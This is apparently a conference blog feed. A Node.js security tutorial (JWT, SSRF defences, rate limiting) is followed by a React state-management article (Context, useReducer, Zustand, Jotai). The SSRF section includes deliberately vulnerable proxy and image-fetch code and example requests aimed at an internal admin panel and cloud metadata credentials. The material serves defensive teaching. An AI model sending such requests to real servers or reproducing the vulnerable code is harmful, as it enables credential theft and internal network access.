    secure: process.env.NODE_ENV === 'production',
    sameSite: 'strict',
    maxAge: 3600000 // 1 hour
  });

  res.json({ message: 'Authentication successful' });
});

app.get('/protected', (req, res) => {
  try {
    // Extract token from cookie (not from headers)
    const token = req.cookies.token;

    if (!token) {
      return res.status(401).json({ error: 'Authentication required' });
    }

    // Verify token with all necessary options
    const decoded = jwt.verify(token, secret, {
      issuer: 'my-app',
      audience: 'my-api'
    });

    // Additional validation
    if (decoded.role !== 'admin') {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }

    res.json({ data: 'Protected resource' });
  } catch (error) {
    if (error.name === 'TokenExpiredError') {
      return res.status(401).json({ error: 'Token expired' });
    }
    res.status(401).json({ error: 'Invalid token' });
  }
});

This above code snippet demonstrates a strong focus on security through several measures:

  • Environment Variables: Some of the sensitive data like the JWT secret are stored in environment variables. This helps in avoiding the data being hardcoded and reduces the risk of exposure.
  • Secure Cookies: The JWT token is saved in an HttpOnly cookie with the secure and SameSite=strict flags, protecting it from theft via XSS and mitigating CSRF attacks.
  • Role Based Access Control: The implementation checks the user’s role before allowing access to the protected resources in the application. Only authorized users can access sensitive endpoints.
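The role check can be factored into reusable middleware. The sketch below assumes an upstream authentication step has attached the decoded token to req.user (a common convention, not something the snippet above does verbatim); because Express middleware is just a (req, res, next) function, the logic can be tested without Express itself.

```javascript
// Minimal role-based access control as Express-style middleware.
// Assumption: a prior middleware (e.g. JWT verification) sets req.user.
function requireRole(role) {
  return (req, res, next) => {
    if (!req.user || req.user.role !== role) {
      // Reject with 403 and never call the downstream handler
      return res.status(403).json({ error: 'Insufficient permissions' });
    }
    next();
  };
}

// Usage in an app: app.get('/admin', requireRole('admin'), adminHandler);
```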

Topic 3 – Preventing SSRF Attacks in Node.js Security

Server-Side Request Forgery (SSRF) is a class of vulnerability in which attackers trick a server into making requests to unintended targets. This is particularly relevant in the Node.js environment, where HTTP requests are easy to make with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');
const axios = require('axios');
const app = express();

app.get('/proxy', async (req, res) => {
  const url = req.query.url;
  try {
    // User can control the URL completely
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let’s see a secure way of the implementation:

const express = require('express');
const axios = require('axios');
const URL = require('url').URL;
const app = express();

// Define allowed domains
const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];

app.get('/proxy', async (req, res) => {
  const url = req.query.url;

  try {
    // Validate URL format
    const parsedUrl = new URL(url);
    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {
      return res.status(403).json({ error: 'Domain not allowed' });
    }

    // Proceed with request to allowed domain
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Define a list of allowed domains (ALLOWED_HOSTS).
  • Check whether the hostname of the user-supplied URL is in this list before proceeding with the request.
  • This ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • It also prevents the application from making requests to unauthorized or potentially malicious domains.
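The same whitelisting logic can be extracted into a small helper built on Node’s built-in WHATWG URL parser, which also rejects malformed URLs and non-HTTP protocols in one place. A sketch, reusing the ALLOWED_HOSTS list from the example above:

```javascript
// Returns true only for well-formed http/https URLs whose hostname is on
// the allow list. Returns false instead of throwing for unparseable input,
// so callers can reject with a single code path.
function isAllowedUrl(rawUrl, allowedHosts) {
  let parsed;
  try {
    parsed = new URL(rawUrl); // global in Node >= 10
  } catch {
    return false; // malformed URL
  }
  if (!['http:', 'https:'].includes(parsed.protocol)) return false;
  return allowedHosts.includes(parsed.hostname);
}

const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];
```

Centralizing the check also makes it easy to unit-test the bypass attempts (wrong protocol, lookalike hostnames, garbage input) separately from the proxy route.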
  2. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // Downloads from any URL without validation
    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });
    const imageBuffer = Buffer.from(response.data);

    // Save to local storage
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

An attacker can supply a malicious URL that can force the server to make requests to internal services or endpoints that should not be accessed by the public. This can result in the exposure of sensitive information or internal networks.

Example Attack:

POST /fetch-image
Body: { "imageUrl": "http://169.254.zzz.xxx/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well formed. Disallow anything but http and https to avoid the possibility of harmful protocols being used.
  • DNS Resolution and IP Blocking: Resolve the hostname to an IP address using dns.lookup and block private ranges (10.x.x.x, 172.16.x.x to 172.31.x.x, 192.168.x.x, 127.x.x.x, 169.254.x.x) so the server cannot be steered toward internal network resources, preventing SSRF attacks.
  • Preventing Redirects: Set the maxRedirects property of the axios request to 0 to avoid redirect-based bypasses that can allow access to prohibited URLs.
const dns = require('dns').promises;

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // 1. Validate URL format
    const parsedUrl = new URL(imageUrl);

    // 2. Only allow http/https protocols
    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {
      return res.status(403).json({ error: 'Protocol not allowed' });
    }

    // 3. Resolve hostname to IP
    const { address } = await dns.lookup(parsedUrl.hostname);

    // 4. Block private IP ranges
    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {
      return res.status(403).json({ error: 'Cannot access internal resources' });
    }

    // 5. Now safe to proceed
    const response = await axios.get(imageUrl, {
      responseType: 'arraybuffer',
      maxRedirects: 0 // Prevent redirect-based bypasses
    });

    const imageBuffer = Buffer.from(response.data);
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock systems offline or exhaust their resources:

  1. Distributed Denial of Service (DDoS): Your server is flooded with requests from many sources, so legitimate users are unable to access the service.
  2. Brute Force Attempts: Attackers use automated tools to try random credential combinations against your login in an attempt to guess valid authentication credentials.
  3. Scraping and Harvesting: Bots make large numbers of requests to gather content from your application, degrading performance and leaking data.
  4. API Abuse: Excessive API requests that consume resources or abuse the free-tier quotas of your application’s APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');

const apiLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100, // limit each IP to 100 requests per windowMs
  message: 'Too many requests, please try again later.'
});

app.use('/api/', apiLimiter); // Apply to all API endpoints

To have a finer level of control, set different rate limits on different endpoints depending on the level of sensitivity and resource requirement of the endpoints.

For instance, authentication endpoints are usually more secure than general content endpoints. Moreover, implement progressive delays for failed attempts and account lockout policies for persistent failures. The library node-rate-limiter-flexible helps enhance features like Redis-based distributed rate limiting for apps deployed on multiple servers.
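Under the hood, these libraries implement variations of a simple idea: count requests per key within a time window. A minimal in-memory sketch of a fixed-window limiter (illustrative only; use express-rate-limit or node-rate-limiter-flexible in production):

```javascript
// Fixed-window rate limiter: allow at most `max` requests per `windowMs`
// per key (e.g. per client IP). In-memory only, so it neither survives
// restarts nor spans multiple servers -- that is where Redis-backed
// limiters come in.
function createRateLimiter({ windowMs, max }) {
  const hits = new Map(); // key -> { count, windowStart }
  return function isAllowed(key, now = Date.now()) {
    const entry = hits.get(key);
    if (!entry || now - entry.windowStart >= windowMs) {
      hits.set(key, { count: 1, windowStart: now }); // start a fresh window
      return true;
    }
    entry.count += 1;
    return entry.count <= max;
  };
}

const limiter = createRateLimiter({ windowMs: 15 * 60 * 1000, max: 100 });
// In a handler: if (!limiter(req.ip)) return res.status(429).end();
```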

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));

app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');

app.use(helmet());

Infrastructure-Level Protection

Security is best approached at the infrastructure level, with application-level measures as a secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can act as a barrier in front of your application, performing rate limiting and filtering before requests reach Node.js.
  • CDNs: Cloudflare or Fastly offer integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door, or Google Cloud Armor can monitor and filter traffic.
  • Load Balancers: They distribute traffic across multiple instances, absorbing load spikes and filtering suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in detail in this article, attackers are always looking for ways to exploit traffic vulnerabilities. Therefore, a layered approach is necessary. Key points to keep in mind include:

  • In-depth defense is essential: Combine application-level protections such as middleware and request limits with infrastructure-level defenses like reverse proxies, CDNs, and WAFs to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: Effective defense requires recognizing patterns such as DDoS attacks, brute-force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits properly to block malicious traffic without affecting the service quality for legitimate users. Endpoints need different thresholds according to their risk and frequency of use.
  • Implement graduated responses: Escalate measures step by step, from slight delays to temporary blocks to permanent IP bans, according to the frequency and severity of suspicious activity.
  • Continuously monitor and adjust: Security is not set-and-forget: traffic patterns should be analyzed regularly, rate limits reviewed and adjusted, and protection mechanisms updated to address new threats and application requirements.
  • Leverage existing tools: Use proven solutions such as express-rate-limit, Cloudflare, or AWS WAF rather than building your own and risking critical implementation errors.
  • Consider distributed applications: For applications deployed on several servers, implement distributed rate limiting using Redis or a similar technology so that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
What’s the Best Way to Manage State in React? https://javascript-conference.com/blog/react-state-management-context-zustand-jotai/ Wed, 30 Jul 2025 11:51:42 +0000 https://javascript-conference.com/?p=108242 No topic is as controversial in the React world as state management. Unlike many other topics, there aren’t just two camps. Solutions range from categorically rejecting central state management to implementing state management solutions with React’s built-in tools or lightweight libraries, right through to using heavyweight solutions that determine the entire application’s architecture. Let’s examine several state management approaches and use cases, focusing on lightweight solutions with a low overhead and a limited impact on the overall application.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component can retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common ancestor, i.e., the parent component of all components that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React’s Context API, the only solution is to store shopping cart data in the state of a component that’s a parent to both components. Then, this passes its state to the components using props. This creates a very tight coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates the need to take a detour with the context’s provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last piece of the implementation is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it indicates that useCart was used outside of CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This is possible by using the useCart function to access the state of the shopping cart and entering the current product quantity in the input field. Use the setCart function to update the context.

One disadvantage of this implementation is that the ListItem component has to know the CartContext in detail and performs the state update itself in the callback passed to the setCart function. You can solve this by extracting this block into a separate function, which the ListItem component, as well as every other component in the application, can then access.

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data));
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [React.RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management with the useReducer hook. This differs from the more commonly used useState hook and does not provide a function for changing the state. Instead, it returns a tuple of readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.
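
The type/payload shape described above can be illustrated with a small, framework-free reducer. The names here (demoCartReducer, the action strings) are hypothetical stand-ins, simplified from the listings that follow:

```javascript
// A pure reducer: the same state plus the same action always yield the same new state.
function demoCartReducer(state, action) {
  switch (action.type) {
    case 'addItem':
      // action.payload carries the data needed for the change
      return { items: [...state.items, action.payload] };
    case 'clearCart':
      return { items: [] };
    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

let state = { items: [] };
state = demoCartReducer(state, { type: 'addItem', payload: { id: 1, quantity: 2 } });
console.log(state.items.length); // 1
```

Because the reducer never mutates its input and performs no side effects, each transition can be unit-tested by comparing plain objects.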

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer-Hooks

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting, though, is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot modify the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state is still with the useCart function. The useAddToCart function creates a new function that you can pass a new updated item from the shopping cart to. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the business logic of your application’s state management. Therefore, dedicated libraries exist, and Zustand is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of the state of an application. The Zustand API is minimalistic, yet the library has all the features you need to centrally manage the state of your application. The stores are the central element, which are created with the create function. They hold the state and provide methods for modification. In your application’s components, you can interact with Zustand’s stores using hook functions. The library lets you perform both synchronous and asynchronous actions and gives the option of storing the state in the browser’s LocalStorage or IndexedDb via middleware. We don’t have to go that far for shopping cart management implementation in our example. It’s enough to load an existing shopping cart from the server and manage it with the list component. It should be possible to access the state from other components, like CartOverview, which shows a summary of the shopping cart.

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

Zustand’s create function is implemented as a generic function. This means you can pass the state structure to it. TypeScript helps where needed, whether in your development environment or your application’s build process. Pass a callback function to the create function; you can use the get function for read access and the set function for write access to the state. The set function behaves similarly to React’s setState function. You can use the previous state to define a new structure and use it as the return value. The callback function that you pass to create returns an object structure. Then, define the state structure (in our case, this is cartItems) and methods for accessing it like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.
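
The replace-or-append logic inside addToCart can be pulled out into a pure helper, which makes it trivial to unit-test. This is a hypothetical refactoring, not part of the listing; `upsertItem` is an invented name:

```javascript
// Hypothetical pure helper: replaces an existing cart item by id, or appends it.
function upsertItem(cartItems, item) {
  const index = cartItems.findIndex((cartItem) => cartItem.id === item.id);
  if (index === -1) {
    return [...cartItems, item]; // new product: append
  }
  const updated = [...cartItems];
  updated[index] = item; // existing product: replace with the new quantity
  return updated;
}

const items = upsertItem([{ id: 1, quantity: 1 }], { id: 1, quantity: 3 });
console.log(items); // [{ id: 1, quantity: 3 }]
```

The store's addToCart could then call `set((state) => ({ cartItems: upsertItem(state.cartItems, item) }))`, keeping the asynchronous server call separate from the pure state transition.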

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Work with state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function and use the cartItems structure to access the data in the store and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What’s remarkable about Zustand is that you don’t have to worry about integrating a provider. That’s because Zustand doesn’t rely on React’s Context API to manage global state. One disadvantage is that the state is truly global. So you can’t have two identical stores with different data states in your component hierarchy’s subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. Individual central state elements and their interfaces are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. The connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer structures. The atom is the central element here. In a simple instance, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you have the option of defining the type of the atom value as generic.

